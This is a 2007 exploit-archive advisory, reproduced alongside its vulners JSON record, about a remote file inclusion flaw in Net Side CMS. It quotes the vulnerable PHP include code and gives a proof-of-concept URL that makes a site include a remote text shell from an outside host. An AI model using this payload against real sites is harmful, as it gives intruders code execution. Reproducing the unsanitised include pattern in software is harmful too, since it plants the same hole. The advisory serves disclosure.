I see your future and your future is death. Sharingan !
--------------------------------------------------------------------------------------------------------------
Hi I'm sharingan and this is my vuln :
script name :
Net Side Content Management System
(2 versions found both vulnerable | Version names not available since the script isn't downloadable)
vuln file :
index.php |and maybe others ... haven't checked|
vuln code version 1:
[...]
if ($_GET["cms"] == "" or $_GET["cms"] == "titel")
{
include "titel.inc.php";
}
else
{
include $_GET["cms"].".inc.php";
[...]
vuln code version 2:
[...]
$includepath = "";
[...]
if ($_GET["cms"] == "")
{
include $includepath."titel.inc.php";
}
else
{
include $includepath.$_GET["cms"].".inc.php";
[...]
proof of concept :
http://site.com/index.php?cms=http://whatever.com/textshell.txt?
"powered by Net-Side.net"
--------------------------------------------------------------------------------------------------------------
greetz mozi and all php freaks.
oh yeah and a friendly Hi! to RST.
# milw0rm.com [2007-03-24]
{"id": "SECURITYVULNS:DOC:16477", "bulletinFamily": "software", "title": "Net Side Content Management System", "description": "I see your future and your future is death. Sharingan !\r\n--------------------------------------------------------------------------------------------------------------\r\nHi I'm sharingan and this is my vuln :\r\nscript name :\r\nNet Side Content Management System\r\n(2 versions found both vulnerable | Version names not available since the script isn't downloadable)\r\n\r\nvuln file :\r\nindex.php |and maybe others ... haven't checked|\r\nvuln code version 1:\r\n[...]\r\n if ($_GET["cms"] == "" or $_GET["cms"] == "titel")\r\n {\r\n include "titel.inc.php";\r\n }\r\n else\r\n {\r\n include $_GET["cms"].".inc.php";\r\n[...]\r\nvuln code version 2:\r\n[...]\r\n$includepath = "";\r\n[...]\r\nif ($_GET["cms"] == "")\r\n {\r\n include $includepath."titel.inc.php";\r\n }\r\n else\r\n {\r\n include $includepath.$_GET["cms"].".inc.php";\r\n[...]\r\n\r\nproof of concept :\r\nhttp://site.com/index.php?cms=http://whatever.com/textshell.txt?\r\n"powered by Net-Side.net"\r\n--------------------------------------------------------------------------------------------------------------\r\ngreetz mozi and all php freaks.\r\noh yeah and a friendly Hi! to RST.\r\n\r\n# milw0rm.com [2007-03-24]\r\n", "published": "2007-03-25T00:00:00", "modified": "2007-03-25T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:16477", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:10:21", "edition": 1, "viewCount": 16, "enchantments": {"score": {"value": 1.4, "vector": "NONE"}, "dependencies": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:7465"]}], "rev": 4}, "backreferences": {}, "exploitation": null, "vulnersScore": 1.4}, "affectedSoftware": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645649601}}